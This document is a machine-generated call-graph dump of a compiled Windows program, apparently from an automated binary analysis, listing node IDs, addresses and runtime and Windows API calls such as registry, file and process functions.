95540->95537 95544 f34a56 62 API calls 95541->95544 95542->95537 95543->95537 95545->95474 95547 f2e624 95546->95547 95548 f2e60f 95546->95548 95553 f2e61f 95547->95553 95565 f2dc0b 95547->95565 95590 f2f2d9 20 API calls __dosmaperr 95548->95590 95551 f2e614 95591 f327ec 26 API calls __cftof 95551->95591 95553->95478 95557 f2d955 __fread_nolock 26 API calls 95558 f2e646 95557->95558 95575 f3862f 95558->95575 95561 f329c8 _free 20 API calls 95561->95553 95562->95473 95563->95477 95564->95477 95566 f2dc1f 95565->95566 95567 f2dc23 95565->95567 95571 f34d7a 95566->95571 95567->95566 95568 f2d955 __fread_nolock 26 API calls 95567->95568 95569 f2dc43 95568->95569 95592 f359be 95569->95592 95572 f34d90 95571->95572 95573 f2e640 95571->95573 95572->95573 95574 f329c8 _free 20 API calls 95572->95574 95573->95557 95574->95573 95576 f38653 95575->95576 95577 f3863e 95575->95577 95579 f3868e 95576->95579 95583 f3867a 95576->95583 95715 f2f2c6 20 API calls __dosmaperr 95577->95715 95717 f2f2c6 20 API calls __dosmaperr 95579->95717 95580 f38643 95716 f2f2d9 20 API calls __dosmaperr 95580->95716 95712 f38607 95583->95712 95584 f38693 95718 f2f2d9 20 API calls __dosmaperr 95584->95718 95587 f2e64c 95587->95553 95587->95561 95588 f3869b 95590->95551 95591->95553 95593 f359ca CallCatchBlock 95592->95593 95594 f359d2 95593->95594 95597 f359ea 95593->95597 95671 f2f2c6 20 API calls __dosmaperr 95594->95671 95595 f35a88 95676 f2f2c6 20 API calls __dosmaperr 95595->95676 95597->95595 95600 f35a1f 95597->95600 95599 f359d7 95672 f2f2d9 20 API calls __dosmaperr 95599->95672 95617 f35147 EnterCriticalSection 95600->95617 95601 f35a8d 95677 f2f2d9 20 API calls __dosmaperr 95601->95677 95605 f35a25 95607 f35a41 95605->95607 95608 f35a56 95605->95608 95606 f35a95 95678 f327ec 26 API calls __cftof 95606->95678 95673 f2f2d9 20 API calls __dosmaperr 95607->95673 95618 f35aa9 95608->95618 95611 f359df __fread_nolock 95611->95566 95613 f35a46 95617->95605 95619 f35ad7 95618->95619 95658 f35ad0 95618->95658 95620 f35adb 95619->95620 95621 f35afa 95619->95621 95671->95599 95672->95611 95673->95613 95676->95601 95677->95606 95678->95611 95720 f38585 95712->95720 95715->95580 95716->95587 95717->95584 95718->95588 95721 f38591 CallCatchBlock 95720->95721 95731 f35147 EnterCriticalSection 95721->95731 95723 f3859f 95731->95723 95769 f5d8dd GetTempPathW 95770 f5d8fa 95769->95770 95771 f01098 95776 f042de 95771->95776 95775 f010a7 95777 f0a961 22 API calls 95776->95777 95778 f042f5 GetVersionExW 95777->95778 95779 f06b57 22 API calls 95778->95779 95780 f04342 95779->95780 95781 f093b2 22 API calls 95780->95781 95791 f04378 95780->95791 95782 f0436c 95781->95782 95784 f037a0 22 API calls 95782->95784 95783 f0441b GetCurrentProcess IsWow64Process 95785 f04437 95783->95785 95784->95791 95786 f43824 GetSystemInfo 95785->95786 95787 f0444f LoadLibraryA 95785->95787 95788 f04460 GetProcAddress 95787->95788 95789 f0449c GetSystemInfo 95787->95789 95788->95789 95793 f04470 GetNativeSystemInfo 95788->95793 95790 f04476 95789->95790 95794 f0109d 95790->95794 95795 f0447a FreeLibrary 95790->95795 95791->95783 95792 f437df 95791->95792 95793->95790 95796 f200a3 29 API calls __onexit 95794->95796 95795->95794 95796->95775 95797 f390fa 95798 f39107 95797->95798 95803 f3911f 95797->95803 95847 f2f2d9 20 API calls __dosmaperr 95798->95847 95800 f3910c 95848 f327ec 26 API calls __cftof 95800->95848 95802 f39117 95803->95802 95804 f3917a 95803->95804 95849 f3fdc4 21 API calls 2 library calls 95803->95849 95806 f2d955 __fread_nolock 26 API calls 95804->95806 95807 f39192 95806->95807 95817 f38c32 95807->95817 95809 f39199 95809->95802 95810 f2d955 __fread_nolock 26 API calls 95809->95810 95811 f391c5 95810->95811 95811->95802 95812 f2d955 __fread_nolock 26 API calls 95811->95812 95813 f391d3 95812->95813 95813->95802 95814 f2d955 __fread_nolock 26 API calls 95813->95814 95815 f391e3 95814->95815 95816 f2d955 __fread_nolock 26 API calls 95815->95816 95816->95802 95818 f38c3e CallCatchBlock 95817->95818 95819 f38c46 95818->95819 95820 f38c5e 95818->95820 95851 f2f2c6 20 API calls __dosmaperr 95819->95851 95822 f38d24 95820->95822 95827 f38c97 95820->95827 95858 f2f2c6 20 API calls __dosmaperr 95822->95858 95823 f38c4b 95852 f2f2d9 20 API calls __dosmaperr 95823->95852 95825 f38d29 95859 f2f2d9 20 API calls __dosmaperr 95825->95859 95829 f38ca6 95827->95829 95830 f38cbb 95827->95830 95853 f2f2c6 20 API calls __dosmaperr 95829->95853 95850 f35147 EnterCriticalSection 95830->95850 95832 f38cb3 95860 f327ec 26 API calls __cftof 95832->95860 95834 f38cc1 95836 f38cf2 95834->95836 95837 f38cdd 95834->95837 95835 f38cab 95854 f2f2d9 20 API calls __dosmaperr 95835->95854 95842 f38d45 __fread_nolock 38 API calls 95836->95842 95855 f2f2d9 20 API calls __dosmaperr 95837->95855 95839 f38c53 __fread_nolock 95839->95809 95844 f38ced 95842->95844 95843 f38ce2 95856 f2f2c6 20 API calls __dosmaperr 95843->95856 95857 f38d1c LeaveCriticalSection __wsopen_s 95844->95857 95847->95800 95848->95802 95849->95804 95850->95834 95851->95823 95852->95839 95853->95835 95854->95832 95855->95843 95856->95844 95857->95839 95858->95825 95859->95832 95860->95839 95861 f203fb 95862 f20407 CallCatchBlock 95861->95862 95890 f1feb1 95862->95890 95864 f20561 95917 f2083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 95864->95917 95866 f2040e 95866->95864 95868 f20438 95866->95868 95867 f20568 95918 f24e52 28 API calls _abort 95867->95918 95878 f20477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 95868->95878 95901 f3247d 95868->95901 95870 f2056e 95919 f24e04 28 API calls _abort 95870->95919 95874 f20576 95875 f20457 95877 f204d8 95909 f20959 95877->95909 95878->95877 95913 f24e1a 38 API calls 3 library calls 95878->95913 95881 f204de 95882 f204f3 95881->95882 95914 f20992 GetModuleHandleW 95882->95914 95884 f204fa 95884->95867 95885 f204fe 95884->95885 95886 f20507 95885->95886 95915 f24df5 28 API calls _abort 95885->95915 95916 f20040 13 API calls 2 library calls 95886->95916 95889 f2050f 95889->95875 95891 f1feba 95890->95891 95920 f20698 IsProcessorFeaturePresent 95891->95920 95893 f1fec6 95921 f22c94 10 API calls 3 library calls 95893->95921 95895 f1fecb 95896 f1fecf 95895->95896 95922 f32317 95895->95922 95896->95866 95899 f1fee6 95899->95866 95902 f32494 95901->95902 95903 f20a8c CatchGuardHandler 5 API calls 95902->95903 95904 f20451 95903->95904 95904->95875 95905 f32421 95904->95905 95906 f32450 95905->95906 95907 f20a8c CatchGuardHandler 5 API calls 95906->95907 95908 f32479 95907->95908 95908->95878 95973 f22340 95909->95973 95912 f2097f 95912->95881 95913->95877 95914->95884 95915->95886 95916->95889 95917->95867 95918->95870 95919->95874 95920->95893 95921->95895 95926 f3d1f6 95922->95926 95925 f22cbd 8 API calls 3 library calls 95925->95896 95929 f3d213 95926->95929 95930 f3d20f 95926->95930 95927 f20a8c CatchGuardHandler 5 API calls 95928 f1fed8 95927->95928 95928->95899 95928->95925 95929->95930 95932 f34bfb 95929->95932 95930->95927 95933 f34c07 CallCatchBlock 95932->95933 95944 f32f5e EnterCriticalSection 95933->95944 95935 f34c0e 95945 f350af 95935->95945 95937 f34c1d 95938 f34c2c 95937->95938 95958 f34a8f 29 API calls 95937->95958 95960 f34c48 LeaveCriticalSection _abort 95938->95960 95941 f34c3d __fread_nolock 95941->95929 95942 f34c27 95959 f34b45 GetStdHandle GetFileType 95942->95959 95944->95935 95946 f350bb CallCatchBlock 95945->95946 95947 f350c8 95946->95947 95948 f350df 95946->95948 95969 f2f2d9 20 API calls __dosmaperr 95947->95969 95961 f32f5e EnterCriticalSection 95948->95961 95951 f350cd 95970 f327ec 26 API calls __cftof 95951->95970 95953 f350d7 __fread_nolock 95953->95937 95954 f35117 95971 f3513e LeaveCriticalSection _abort 95954->95971 95955 f350eb 95955->95954 95962 f35000 95955->95962 95958->95942 95959->95938 95960->95941 95961->95955 95963 f34c7d pair 20 API calls 95962->95963 95964 f35012 95963->95964 95968 f3501f 95964->95968 95972 f33405 11 API calls 2 library calls 95964->95972 95965 f329c8 _free 20 API calls 95967 f35071 95965->95967 95967->95955 95968->95965 95969->95951 95970->95953 95971->95953 95972->95964 95974 f2096c GetStartupInfoW 95973->95974 95974->95912 95975 f0105b 95980 f0344d 95975->95980 95977 f0106a 96011 f200a3 29 API calls __onexit 95977->96011 95979 f01074 95981 f0345d __wsopen_s 95980->95981 95982 f0a961 22 API calls 95981->95982 95983 f03513 95982->95983 95984 f03a5a 24 API calls 95983->95984 95985 f0351c 95984->95985 96012 f03357 95985->96012 95988 f033c6 22 API calls 95989 f03535 95988->95989 95990 f0515f 22 API calls 95989->95990 95991 f03544 95990->95991 95992 f0a961 22 API calls 95991->95992 95993 f0354d 95992->95993 95994 f0a6c3 22 API calls 95993->95994 95995 f03556 RegOpenKeyExW 95994->95995 95996 f43176 RegQueryValueExW 95995->95996 96000 f03578 95995->96000 95997 f43193 95996->95997 95998 f4320c RegCloseKey 95996->95998 95999 f1fe0b 22 API calls 95997->95999 95998->96000 96010 f4321e _wcslen 95998->96010 96001 f431ac 95999->96001 96000->95977 96002 f05722 22 API calls 96001->96002 96003 f431b7 RegQueryValueExW 96002->96003 96004 f431d4 96003->96004 96007 f431ee ISource 96003->96007 96005 f06b57 22 API calls 96004->96005 96005->96007 96006 f04c6d 22 API calls 96006->96010 96007->95998 96008 f09cb3 22 API calls 96008->96010 96009 f0515f 22 API calls 96009->96010 96010->96000 96010->96006 96010->96008 96010->96009 96011->95979 96013 f41f50 __wsopen_s 96012->96013 96014 f03364 GetFullPathNameW 96013->96014 96015 f03386 96014->96015 96016 f06b57 22 API calls 96015->96016 96017 f033a4 96016->96017 96017->95988 96018 f0f7bf 96019 f0f7d3 96018->96019 96020 f0fcb6 96018->96020 96021 f0fcc2 96019->96021 96023 f1fddb 22 API calls 96019->96023 96111 f0aceb 23 API calls ISource 96020->96111 96112 f0aceb 23 API calls ISource 96021->96112 96025 f0f7e5 96023->96025 96025->96021 96026 f0f83e 96025->96026 96027 f0fd3d 96025->96027 96050 f0ed9d ISource 96026->96050 96053 f11310 96026->96053 96113 f71155 22 API calls 96027->96113 96030 f0fef7 96037 f0a8c7 22 API calls 96030->96037 96030->96050 96033 f54600 96038 f0a8c7 22 API calls 96033->96038 96033->96050 96034 f54b0b 96115 f7359c 82 API calls __wsopen_s 96034->96115 96037->96050 96038->96050 96040 f0a8c7 22 API calls 96049 f0ec76 ISource 96040->96049 96041 f0fbe3 96043 f54bdc 96041->96043 96041->96050 96052 f0f3ae ISource 96041->96052 96042 f0a961 22 API calls 96042->96049 96116 f7359c 82 API calls __wsopen_s 96043->96116 96045 f20242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96045->96049 96046 f54beb 96117 f7359c 82 API calls __wsopen_s 96046->96117 96047 f1fddb 22 API calls 96047->96049 96048 f200a3 29 API calls pre_c_initialization 96048->96049 96049->96030 96049->96033 96049->96034 96049->96040 96049->96041 96049->96042 96049->96045 96049->96046 96049->96047 96049->96048 96049->96050 96051 f201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96049->96051 96049->96052 96109 f101e0 256 API calls 2 library calls 96049->96109 96110 f106a0 41 API calls ISource 96049->96110 96051->96049 96052->96050 96114 f7359c 82 API calls __wsopen_s 96052->96114 96054 f117b0 96053->96054 96055 f11376 96053->96055 96332 f20242 5 API calls __Init_thread_wait 96054->96332 96056 f11390 96055->96056 96057 f56331 96055->96057 96118 f11940 96056->96118 96061 f5633d 96057->96061 96337 f8709c 256 API calls 96057->96337 96059 f117ba 96063 f117fb 96059->96063 96065 f09cb3 22 API calls 96059->96065 96061->96049 96068 f56346 96063->96068 96070 f1182c 96063->96070 96074 f117d4 96065->96074 96066 f11940 9 API calls 96067 f113b6 96066->96067 96067->96063 96069 f113ec 96067->96069 96338 f7359c 82 API calls __wsopen_s 96068->96338 96069->96068 96093 f11408 __fread_nolock 96069->96093 96334 f0aceb 23 API calls ISource 96070->96334 96073 f11839 96335 f1d217 256 API calls 96073->96335 96333 f201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96074->96333 96077 f5636e 96339 f7359c 82 API calls __wsopen_s 96077->96339 96078 f1152f 96080 f563d1 96078->96080 96081 f1153c 96078->96081 96341 f85745 54 API calls _wcslen 96080->96341 96083 f11940 9 API calls 96081->96083 96085 f11549 96083->96085 96084 f1fddb 22 API calls 96084->96093 96090 f11940 9 API calls 96085->96090 96098 f115c7 ISource 96085->96098 96086 f11872 96336 f1faeb 23 API calls 96086->96336 96087 f1fe0b 22 API calls 96087->96093 96088 f1171d 96088->96049 96094 f11563 96090->96094 96092 f0ec40 256 API calls 96092->96093 96093->96073 96093->96077 96093->96078 96093->96084 96093->96087 96093->96092 96095 f563b2 96093->96095 96093->96098 96094->96098 96101 f0a8c7 22 API calls 96094->96101 96340 f7359c 82 API calls __wsopen_s 96095->96340 96097 f11940 9 API calls 96097->96098 96098->96086 96098->96097 96100 f1167b ISource 96098->96100 96106 f04f39 68 API calls 96098->96106 96128 f76ef1 96098->96128 96208 f8958b 96098->96208 96211 f6d4ce 96098->96211 96214 f8959f 96098->96214 96217 f1effa 96098->96217 96274 f7744a 96098->96274 96342 f7359c 82 API calls __wsopen_s 96098->96342 96100->96088 96331 f1ce17 22 API calls ISource 96100->96331 96101->96098 96106->96098 96109->96049 96110->96049 96111->96021 96112->96027 96113->96050 96114->96050 96115->96050 96116->96046 96117->96050 96119 f11981 96118->96119 96120 f1195d 96118->96120 96343 f20242 5 API calls __Init_thread_wait 96119->96343 96121 f113a0 96120->96121 96345 f20242 5 API calls __Init_thread_wait 96120->96345 96121->96066 96124 f1198b 96124->96120 96344 f201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96124->96344 96125 f18727 96125->96121 96346 f201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96125->96346 96129 f0a961 22 API calls 96128->96129 96130 f76f1d 96129->96130 96131 f0a961 22 API calls 96130->96131 96132 f76f26 96131->96132 96133 f76f3a 96132->96133 96521 f0b567 96132->96521 96347 f07510 96133->96347 96136 f770bf 96140 f04ecb 94 API calls 96136->96140 96137 f76fbc 96139 f07510 53 API calls 96137->96139 96138 f76f57 _wcslen 96138->96136 96138->96137 96207 f770e9 96138->96207 96141 f76fc8 96139->96141 96142 f770d0 96140->96142 96145 f0a8c7 22 API calls 96141->96145 96150 f76fdb 96141->96150 96143 f770e5 96142->96143 96146 f04ecb 94 API calls 96142->96146 96144 f0a961 22 API calls 96143->96144 96143->96207 96147 f7711a 96144->96147 96145->96150 96146->96143 96148 f0a961 22 API calls 96147->96148 96152 f77126 96148->96152 96149 f77027 96151 f07510 53 API calls 96149->96151 96150->96149 96153 f77005 96150->96153 96157 f0a8c7 22 API calls 96150->96157 96155 f77034 96151->96155 96156 f0a961 22 API calls 96152->96156 96154 f033c6 22 API calls 96153->96154 96158 f7700f 96154->96158 96159 f77047 96155->96159 96160 f7703d 96155->96160 96161 f7712f 96156->96161 96157->96153 96162 f07510 53 API calls 96158->96162 96526 f6e199 GetFileAttributesW 96159->96526 96163 f0a8c7 22 API calls 96160->96163 96165 f0a961 22 API calls 96161->96165 96166 f7701b 96162->96166 96163->96159 96168 f77138 96165->96168 96169 f06350 22 API calls 96166->96169 96167 f77050 96170 f77063 96167->96170 96174 f04c6d 22 API calls 96167->96174 96171 f07510 53 API calls 96168->96171 96169->96149 96173 f07510 53 API calls 96170->96173 96180 f77069 96170->96180 96172 f77145 96171->96172 96370 f0525f 96172->96370 96176 f770a0 96173->96176 96174->96170 96527 f6d076 57 API calls 96176->96527 96177 f77166 96179 f04c6d 22 API calls 96177->96179 96181 f77175 96179->96181 96180->96207 96182 f771a9 96181->96182 96183 f04c6d 22 API calls 96181->96183 96184 f0a8c7 22 API calls 96182->96184 96185 f77186 96183->96185 96186 f771ba 96184->96186 96185->96182 96189 f06b57 22 API calls 96185->96189 96187 f06350 22 API calls 96186->96187 96188 f771c8 96187->96188 96190 f06350 22 API calls 96188->96190 96191 f7719b 96189->96191 96192 f771d6 96190->96192 96193 f06b57 22 API calls 96191->96193 96194 f06350 22 API calls 96192->96194 96193->96182 96195 f771e4 96194->96195 96196 f07510 53 API calls 96195->96196 96197 f771f0 96196->96197 96412 f6d7bc 96197->96412 96199 f77201 96200 f6d4ce 4 API calls 96199->96200 96201 f7720b 96200->96201 96202 f07510 53 API calls 96201->96202 96205 f77239 96201->96205 96203 f77229 96202->96203 96466 f72947 96203->96466 96206 f04f39 68 API calls 96205->96206 96206->96207 96207->96098 96556 f87f59 96208->96556 96210 f8959b 96210->96098 96648 f6dbbe lstrlenW 96211->96648 96215 f87f59 120 API calls 96214->96215 96216 f895af 96215->96216 96216->96098 96653 f09c6e 96217->96653 96220 f1fddb 22 API calls 96222 f1f02b 96220->96222 96223 f1fe0b 22 API calls 96222->96223 96226 f1f03c 96223->96226 96224 f1f0a4 96229 f0b567 39 API calls 96224->96229 96233 f1f0b1 96224->96233 96225 f5f0a8 96225->96224 96718 f79caa 39 API calls 96225->96718 96686 f06246 96226->96686 96231 f5f10a 96229->96231 96230 f0a961 22 API calls 96232 f1f04f 96230->96232 96231->96233 96234 f5f112 96231->96234 96235 f06246 CloseHandle 96232->96235 96667 f1fa5b 96233->96667 96237 f0b567 39 API calls 96234->96237 96238 f1f056 96235->96238 96242 f1f0b8 96237->96242 96239 f07510 53 API calls 96238->96239 96240 f1f062 96239->96240 96241 f06246 CloseHandle 96240->96241 96245 f1f06c 96241->96245 96243 f5f127 96242->96243 96244 f1f0d3 96242->96244 96248 f1fe0b 22 API calls 96243->96248 96247 f06270 22 API calls 96244->96247 96690 f05745 96245->96690 96250 f1f0db 96247->96250 96251 f5f12c 96248->96251 96672 f1f141 96250->96672 96255 f5f140 96251->96255 96719 f1f866 ReadFile SetFilePointerEx 96251->96719 96252 f1f085 96698 f053de 96252->96698 96253 f5f0a0 96717 f06216 CloseHandle ISource 96253->96717 96260 f5f144 __fread_nolock 96255->96260 96720 f70e85 22 API calls ___scrt_fastfail 96255->96720 96256 f1f0ea 96256->96260 96714 f062b5 22 API calls 96256->96714 96263 f1f093 96713 f053c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96263->96713 96264 f1f0fe 96268 f1f138 96264->96268 96269 f06246 CloseHandle 96264->96269 96266 f1f09a 96266->96224 96267 f5f069 96266->96267 96716 f6ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96267->96716 96268->96098 96271 f1f12c 96269->96271 96271->96268 96715 f06216 CloseHandle ISource 96271->96715 96272 f5f080 96272->96224 96275 f77474 96274->96275 96276 f77469 96274->96276 96277 f77554 96275->96277 96280 f0a961 22 API calls 96275->96280 96278 f0b567 39 API calls 96276->96278 96279 f1fddb 22 API calls 96277->96279 96320 f776a4 96277->96320 96278->96275 96281 f77587 96279->96281 96282 f77495 96280->96282 96283 f1fe0b 22 API calls 96281->96283 96284 f0a961 22 API calls 96282->96284 96285 f77598 96283->96285 96286 f7749e 96284->96286 96287 f06246 CloseHandle 96285->96287 96288 f07510 53 API calls 96286->96288 96289 f775a3 96287->96289 96290 f774aa 96288->96290 96291 f0a961 22 API calls 96289->96291 96292 f0525f 22 API calls 96290->96292 96293 f775ab 96291->96293 96294 f774bf 96292->96294 96295 f06246 CloseHandle 96293->96295 96296 f06350 22 API calls 96294->96296 96297 f775b2 96295->96297 96299 f774f2 96296->96299 96298 f07510 53 API calls 96297->96298 96300 f775be 96298->96300 96301 f7754a 96299->96301 96303 f6d4ce 4 API calls 96299->96303 96302 f06246 CloseHandle 96300->96302 96305 f0b567 39 API calls 96301->96305 96304 f775c8 96302->96304 96306 f77502 96303->96306 96309 f05745 5 API calls 96304->96309 96305->96277 96306->96301 96307 f77506 96306->96307 96308 f09cb3 22 API calls 96307->96308 96310 f77513 96308->96310 96311 f775e2 96309->96311 96772 f6d2c1 26 API calls 96310->96772 96313 f776de GetLastError 96311->96313 96314 f775ea 96311->96314 96315 f776f7 96313->96315 96316 f053de 27 API calls 96314->96316 96776 f06216 CloseHandle ISource 96315->96776 96319 f775f8 96316->96319 96318 f7751c 96318->96301 96773 f053c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96319->96773 96320->96098 96322 f77645 96325 f1fddb 22 API calls 96322->96325 96323 f775ff 96323->96322 96324 f77619 96323->96324 96774 f6ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96324->96774 96326 f77679 96325->96326 96327 f0a961 22 API calls 96326->96327 96329 f77686 96327->96329 96329->96320 96775 f6417d 22 API calls __fread_nolock 96329->96775 96331->96100 96332->96059 96333->96063 96334->96073 96335->96086 96336->96086 96337->96061 96338->96098 96339->96098 96340->96098 96341->96094 96342->96098 96343->96124 96344->96120 96345->96125 96346->96121 96348 f07525 96347->96348 96364 f07522 96347->96364 96349 f0755b 96348->96349 96350 f0752d 96348->96350 96353 f0756d 96349->96353 96360 f450f6 96349->96360 96362 f4500f 96349->96362 96528 f251c6 26 API calls 96350->96528 96529 f1fb21 51 API calls 96353->96529 96354 f0753d 96357 f1fddb 22 API calls 96354->96357 96355 f4510e 96355->96355 96359 f07547 96357->96359 96361 f09cb3 22 API calls 96359->96361 96531 f25183 26 API calls 96360->96531 96361->96364 96363 f1fe0b 22 API calls 96362->96363 96369 f45088 96362->96369 96365 f45058 96363->96365 96364->96138 96366 f1fddb 22 API calls 96365->96366 96367 f4507f 96366->96367 96368 f09cb3 22 API calls 96367->96368 96368->96369 96530 f1fb21 51 API calls 96369->96530 96371 f0a961 22 API calls 96370->96371 96372 f05275 96371->96372 96373 f0a961 22 API calls 96372->96373 96374 f0527d 96373->96374 96375 f0a961 22 API calls 96374->96375 96376 f05285 96375->96376 96377 f0a961 22 API calls 96376->96377 96378 f0528d 96377->96378 96379 f43df5 96378->96379 96380 f052c1 96378->96380 96381 f0a8c7 22 API calls 96379->96381 96382 f06d25 22 API calls 96380->96382 96383 f43dfe 96381->96383 96384 f052cf 96382->96384 96385 f0a6c3 22 API calls 96383->96385 96386 f093b2 22 API calls 96384->96386 96389 f05304 96385->96389 96387 f052d9 96386->96387 96387->96389 96390 f06d25 22 API calls 96387->96390 96388 f05349 96532 f06d25 96388->96532 96389->96388 96391 f05325 96389->96391 96401 f43e20 96389->96401 96393 f052fa 96390->96393 96391->96388 96396 f04c6d 22 API calls 96391->96396 96395 f093b2 22 API calls 96393->96395 96394 f0535a 96397 f05370 96394->96397 96402 f0a8c7 22 API calls 96394->96402 96395->96389 96399 f05332 96396->96399 96398 f05384 96397->96398 96404 f0a8c7 22 API calls 96397->96404 96403 f0538f 96398->96403 96406 f0a8c7 22 API calls 96398->96406 96399->96388 96405 f06d25 22 API calls 96399->96405 96400 f06b57 22 API calls 96407 f43ee0 96400->96407 96401->96400 96402->96397 96408 f0a8c7 22 API calls 96403->96408 96409 f0539a 96403->96409 96404->96398 96405->96388 96406->96403 96407->96388 96410 f04c6d 22 API calls 96407->96410 96545 f049bd 22 API calls __fread_nolock 96407->96545 96408->96409 96409->96177 96410->96407 96413 f6d7d8 96412->96413 96414 f6d7f3 96413->96414 96415 f6d7dd 96413->96415 96416 f0a961 22 API calls 96414->96416 96418 f0a8c7 22 API calls 96415->96418 96419 f6d7ee 96415->96419 96417 f6d7fb 96416->96417 96420 f0a961 22 API calls 96417->96420 96418->96419 96419->96199 96421 f6d803 96420->96421 96422 f0a961 22 API calls 96421->96422 96423 f6d80e 96422->96423 96424 f0a961 22 API calls 96423->96424 96425 f6d816 96424->96425 96426 f0a961 22 API calls 96425->96426 96427 f6d81e 96426->96427 96428 f0a961 22 API calls 96427->96428 96429 f6d826 96428->96429 96430 f0a961 22 API calls 96429->96430 96431 f6d82e 96430->96431 96432 f0a961 22 API calls 96431->96432 96433 f6d836 96432->96433 96434 f0525f 22 API calls 96433->96434 96435 f6d84d 96434->96435 96436 f0525f 22 API calls 96435->96436 96437 f6d866 96436->96437 96438 f04c6d 22 API calls 96437->96438 96439 f6d872 96438->96439 96440 f6d885 96439->96440 96441 f093b2 22 API calls 96439->96441 96442 f04c6d 22 API calls 96440->96442 96441->96440 96443 f6d88e 96442->96443 96444 f6d89e 96443->96444 96446 f093b2 22 API calls 96443->96446 96445 f6d8b0 96444->96445 96447 f0a8c7 22 API calls 96444->96447 96448 f06350 22 API calls 96445->96448 96446->96444 96447->96445 96449 f6d8bb 96448->96449 96547 f6d978 22 API calls 96449->96547 96451 f6d8ca 96548 f6d978 22 API calls 96451->96548 96453 f6d8dd 96454 f04c6d 22 API calls 96453->96454 96455 f6d8e7 96454->96455 96456 f6d8fe 96455->96456 96457 f6d8ec 96455->96457 96459 f04c6d 22 API calls 96456->96459 96458 f033c6 22 API calls 96457->96458 96461 f6d8f9 96458->96461 96460 f6d907 96459->96460 96462 f6d925 96460->96462 96463 f033c6 22 API calls 96460->96463 96464 f06350 22 API calls 96461->96464 96465 f06350 22 API calls 96462->96465 96463->96461 96464->96462 96465->96419 96467 f72954 __wsopen_s 96466->96467 96468 f1fe0b 22 API calls 96467->96468 96469 f72971 96468->96469 96470 f05722 22 API calls 96469->96470 96471 f7297b 96470->96471 96472 f7274e 27 API calls 96471->96472 96473 f72986 96472->96473 96474 f0511f 64 API calls 96473->96474 96475 f7299b 96474->96475 96476 f729bf 96475->96476 96477 f72a6c 96475->96477 96478 f72e66 75 API calls 96476->96478 96479 f72e66 75 API calls 96477->96479 96480 f729c4 96478->96480 96494 f72a38 96479->96494 96484 f72a75 ISource 96480->96484 96553 f2d583 26 API calls 96480->96553 96482 f050f5 40 API calls 96483 f72a91 96482->96483 96485 f050f5 40 API calls 96483->96485 96484->96205 96487 f72aa1 96485->96487 96486 f729ed 96554 f2d583 26 API calls 96486->96554 96488 f050f5 40 API calls 96487->96488 96490 f72abc 96488->96490 96491 f050f5 40 API calls 96490->96491 96492 f72acc 96491->96492 96493 f050f5 40 API calls 96492->96493 96495 f72ae7 96493->96495 96494->96482 96494->96484 96496 f050f5 40 API calls 96495->96496 96497 f72af7 96496->96497 96498 f050f5 40 API calls 96497->96498 96499 f72b07 96498->96499 96500 f050f5 40 API calls 96499->96500 96501 f72b17 96500->96501 96549 f73017 GetTempPathW GetTempFileNameW 96501->96549 96503 f72b22 96504 f2e5eb 29 API calls 96503->96504 96515 f72b33 96504->96515 96505 f72bed 96506 f2e678 67 API calls 96505->96506 96507 f72bf8 96506->96507 96509 f72c12 96507->96509 96510 f72bfe DeleteFileW 96507->96510 96508 f050f5 40 API calls 96508->96515 96511 f72c91 CopyFileW 96509->96511 96517 f72c18 96509->96517 96510->96484 96512 f72ca7 DeleteFileW 96511->96512 96513 f72cb9 DeleteFileW 96511->96513 96512->96484 96550 f72fd8 CreateFileW 96513->96550 96515->96484 96515->96505 96515->96508 96516 f2dbb3 65 API calls 96515->96516 96516->96515 96518 f722ce 79 API calls 96517->96518 96519 f72c7c 96518->96519 96519->96513 96522 f0b57f 96521->96522 96523 f0b578 96521->96523 96522->96133 96523->96522 96555 f262d1 39 API calls 96523->96555 96525 f0b5c2 96525->96133 96526->96167 96527->96180 96528->96354 96529->96354 96530->96360 96531->96355 96533 f06d91 96532->96533 96534 f06d34 96532->96534 96535 f093b2 22 API calls 96533->96535 96534->96533 96536 f06d3f 96534->96536 96542 f06d62 __fread_nolock 96535->96542 96537 f44c9d 96536->96537 96538 f06d5a 96536->96538 96539 f1fddb 22 API calls 96537->96539 96546 f06f34 22 API calls 96538->96546 96541 f44ca7 96539->96541 96543 f1fe0b 22 API calls 96541->96543 96542->96394 96544 f44cda 96543->96544 96545->96407 96546->96542 96547->96451 96548->96453 96549->96503 96553->96486 96554->96494 96555->96525 96557 f07510 53 API calls 96556->96557 96558 f87f90 96557->96558 96573 f87fd5 ISource 96558->96573 96594 f88cd3 96558->96594 96560 f8844f 96635 f88ee4 60 API calls 96560->96635 96563 f8845e 96564 f8846a 96563->96564 96565 f8828f 96563->96565 96564->96573 96607 f87e86 96565->96607 96566 f07510 53 API calls 96572 f88049 96566->96572 96571 f882c8 96622 f1fc70 96571->96622 96572->96566 96572->96573 96581 f88281 96572->96581 96626 f6417d 22 API calls __fread_nolock 96572->96626 96627 f8851d 42 API calls _strftime 96572->96627 96573->96210 96576 f882e8 96628 f7359c 82 API calls __wsopen_s 96576->96628 96577 f88302 96629 f063eb 22 API calls 96577->96629 96580 f882f3 GetCurrentProcess TerminateProcess 96580->96577 96581->96560 96581->96565 96582 f88311 96630 f06a50 22 API calls 96582->96630 96584 f8832a 96593 f88352 96584->96593 96631 f104f0 22 API calls 96584->96631 96586 f884c5 96586->96573 96588 f884d9 FreeLibrary 96586->96588 96587 f88341 96632 f88b7b 75 API calls 96587->96632 96588->96573 96593->96586 96633 f104f0 22 API calls 96593->96633 96634 f0aceb 23 API calls ISource 96593->96634 96636 f88b7b 75 API calls 96593->96636 96595 f0aec9 22 API calls 96594->96595 96596 f88cee CharLowerBuffW 96595->96596 96637 f68e54 96596->96637 96600 f0a961 22 API calls 96601 f88d2a 96600->96601 96602 f06d25 22 API calls 96601->96602 96603 f88d3e 96602->96603 96604 f093b2 22 API calls 96603->96604 96605 f88d48 _wcslen 96604->96605 96606 f88e5e _wcslen 96605->96606 